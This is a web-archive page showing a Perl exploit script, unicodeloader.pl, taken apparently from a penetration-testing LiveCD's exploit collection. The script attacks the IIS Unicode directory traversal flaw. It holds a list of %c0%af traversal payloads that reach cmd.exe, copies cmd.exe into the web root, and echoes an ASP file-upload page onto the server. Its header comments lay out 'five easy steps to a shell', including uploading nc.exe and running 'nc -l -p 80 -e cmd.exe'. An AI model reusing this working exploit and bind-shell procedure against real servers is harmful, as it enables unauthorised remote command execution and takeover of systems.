home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / iis / unicodeloader.pl

< prev

next >

Wrap

Perl Script  |  2005-02-12  |  6KB  |  171 lines

---

1. #!/usr/bin/perl 
2. #######################
3. # Unicode upload creator
4. # 
5. # Works like this - two files (upload.asp and upload.inc - have 
6. # in the same dir as the PERL script) are build in the webroot 
7. # (or anywhere else) using echo and some conversion strings.
8. # These files allows you to upload any file by 
9. # simply surfing with a browser to the server.
10. # 
11. # Typical use: (5 easy steps to a shell)
12. # 1. Find the webroot (duh)- let say its f:\the web pages\theroot
13. # 2. perl unicodeloader target:80 'f:\the web pages\theroot'
14. # 3. surf to target/upload.asp and upload nc.exe
15. # 4. perl unicodexecute3.pl target:80 'f:\the web pages\theroot\nc -l -p 80 -e cmd.exe'
16. # 5. telnet target 80
17. # 
18. # Above procedure will drop you into a shell on the box
19. # without crashing the server (*winks at Eeye*).
20. # Of coure you might want to upload other goodies as well
21. # right after nc.exe - fscan.exe seems a good choice :)
22. # This procedure is nice for servers that are very tightly 
23. # firewalled; no FTP, RCP or TFTP out of it - as everything
24. # is client---> server on port 80.
25. #
26. # kids, please have a *good* look at the code before you use it :-]
27. # more info at http://www.securityfocus.com/vdb/bottom.html?section=exploit&vid=1806
28. #
29. # 2001/01/24 Roelof Temmingh 
30. # roelof@sensepost.com
31. # http://www.sensepost.com
32. #
33. # PS: if the script breaks during the building of the uploader page
34. #     you should delete both upload.asp and upload.inc manually
35. ######################################################################################
36.  
37. use Socket;
38.  
39. my $runi; my $thedir; $|=1;
40. open (ASP,"upload.asp") || die "Couldnt open the upload.asp file\n";
41. open (INC,"upload.inc") || die "Couldnt open the upload.inc file\n";
42. # --------------init
43. if ($#ARGV<1) {die "Usage: unicodeloader IP:port webroot\n";}
44. my ($host,$port)=split(/:/,@ARGV[0]);
45. my $target = inet_aton($host);
46. my $location=@ARGV[1];
47. print "\nCreating uploading webpage on $host on port $port.\nThe webroot is $location.\n\n";
48. # -------------find the correct string
49. my @unis=(
50. "/scripts/..%c0%af../winnt/system32/cmd.exe?/c",
51. "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c",
52. "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
53. "/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
54. "/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
55. "/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
56. "/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
57. "/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c");
58. my $uni;my $execdir; my $dummy; my $line;
59. foreach $uni (@unis){
60.  print "testing directory $uni\n";
61.  my @results=sendraw("GET $uni+dir HTTP/1.0\r\n\r\n");
62.  foreach $line (@results){
63.   if ($line =~ /Directory/) {
64.   ($dummy,$execdir)=split(/Directory of /,$line);   
65.    $execdir =~ s/\r//g;
66.    $execdir =~ s/\n//g;
67.    if ($execdir =~ / /) {$thedir="%22".$execdir;}
68.     else {$thedir=$execdir;}
69.    $thedir=~ s/ /%20/g;
70.    print "farmer brown directory: $thedir\n";
71.    $runi=$uni; goto further;}
72.  }
73. }
74. die "nope...sorry..not vulnerable\n";
75.  
76. further:
77. #---------------test if upload exists already
78. my $a=`which ifconfig`; chomp $a; 
79. my $aa=`$a -au | grep -i mask | grep -v 127.0.0.1 | head -n 1`; $aa=~s/ //g;
80. sendraw("GET /naughty_real_$aa\r\n\r\n");
81. my $command; my $line;
82. if ($location =~ / /) {$command="dir %22".$location."%22";}
83.  else {$command="dir ".$location;}
84. $command=~s/ /+/g;
85. my @results=sendraw("GET $runi+$command\r\n\r\n");
86. foreach $line (@results){
87.  if ($line =~ /upload.asp/) {die "uploader is there already..\n";}
88. }
89. # --------------test if cmd has been copied:
90. my $failed=1;
91. my $command="dir $thedir%22";
92. $command=~s/ /+/g;
93. my @results=sendraw("GET $runi+$command HTTP/1.0\r\n\r\n");
94. my $line;
95. foreach $line (@results){
96.  if ($line =~ /denied/) {die "cant do a dir in the directory - try switching dirs order around\n";}
97.  if ($line =~ /sensepost.exe/) {print "sensepost.exe found on system\n"; $failed=0;}
98. }
99. #--------------we should copy it if its not there
100. my $failed2=1;
101. if ($failed==1) { 
102.  print "sensepost.exe not found - lets copy it quick\n";
103.  $command="copy c:\\winnt\\system32\\cmd.exe $thedir\\sensepost.exe%22";
104.  $command=~s/ /+/g;
105.  my @results2=sendraw("GET $runi+$command HTTP/1.0\r\n\r\n");
106.  my $line2;
107.  foreach $line2 (@results2){
108.   if (($line2 =~ /copied/ )) {$failed2=0;}
109.   if (($line2 =~ /denied/ )) {die "access denied to copy here - try switching dirs order around\n";}
110.  }
111.  if ($failed2==1) {die "copy of CMD failed - inspect manually:\n@results2\n\n"};
112. } 
113. # ------------ we can assume that the cmd.exe is copied from here..
114. my $path;
115. ($dummy,$path)=split(/:/,$thedir);
116. $path =~ s/\\/\//g;
117. my @unidirs=split(/\//,$runi);
118. my $unidir=@unidirs[1];
119. $runi="/".$unidir."/sensepost.exe?/c";
120. print "uploading ASP section:\n";
121. while (<ASP>) {
122.  chomp;
123.  s/([<^&>])/^$1/g; s/\%/%25/g; s/\>/%3e/g;
124.  s/\</%3c/g; s/([\x0D\x0A])//g; s/\=/%3d/g;
125.  s/\&/%26/g; s/\+/%2b/g;
126.  if ($location =~ / /) {$command="echo $_ >> %22".$location."\\upload.asp%22";}
127.   else {$command="echo $_ >> $location\\upload.asp";}
128.   $command=~s/ /%20/g;
129.   @results=sendraw("GET $runi+$command HTTP/1.0\r\n\r\n");
130.   print ".";
131.   foreach $line (@results){
132.    if ($line =~ /denied/) {die "sorry, access denied to write the upload page\n";}
133.   }
134. }
135. close (ASP);
136. ###its really just the same as the previous one
137. print "\nuploading the INC section: (this may take a while)\n";
138. while (<INC>) {
139.  chomp;
140.  s/([<^&>])/^$1/g; s/\%/%25/g; s/\>/%3e/g;
141.  s/\</%3c/g; s/([\x0D\x0A])//g; s/\=/%3d/g;
142.  s/\&/%26/g;  s/\+/%2b/g;
143.  if ($location =~ / /) {$command="echo $_ >> %22".$location."\\upload.inc%22";}
144.   else {$command="echo $_ >> $location\\upload.inc";}
145.  $command=~s/ /%20/g;
146.  my @results=sendraw("GET $runi+$command HTTP/1.0\r\n\r\n");
147.  print ".";
148. }
149. close (INC);
150. print "\nupload page created. \n\nNow simply surf to $host/upload.asp and enjoy.\n";
151. print "Files will be uploaded to $location\n";
152.  
153. # -------------slighty modified RFP sendraw
154. sub sendraw { 
155.  my ($pstr)=@_;
156.  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
157.  if(connect(S,pack "SnA4x8",2,$port,$target)){
158.   my @in="";
159.   select(S); $|=1; print $pstr;
160.   while(<S>) { 
161.    push @in,$_; last if ($line=~ /^[\r\n]+$/ );}
162.   select(STDOUT); return @in;
163.  } else { die("connect problems\n"); }
164. }
165. # Spidermark: sensepostdata unicodeloader
166.  
167.  
168.  
169.  
170.  
171.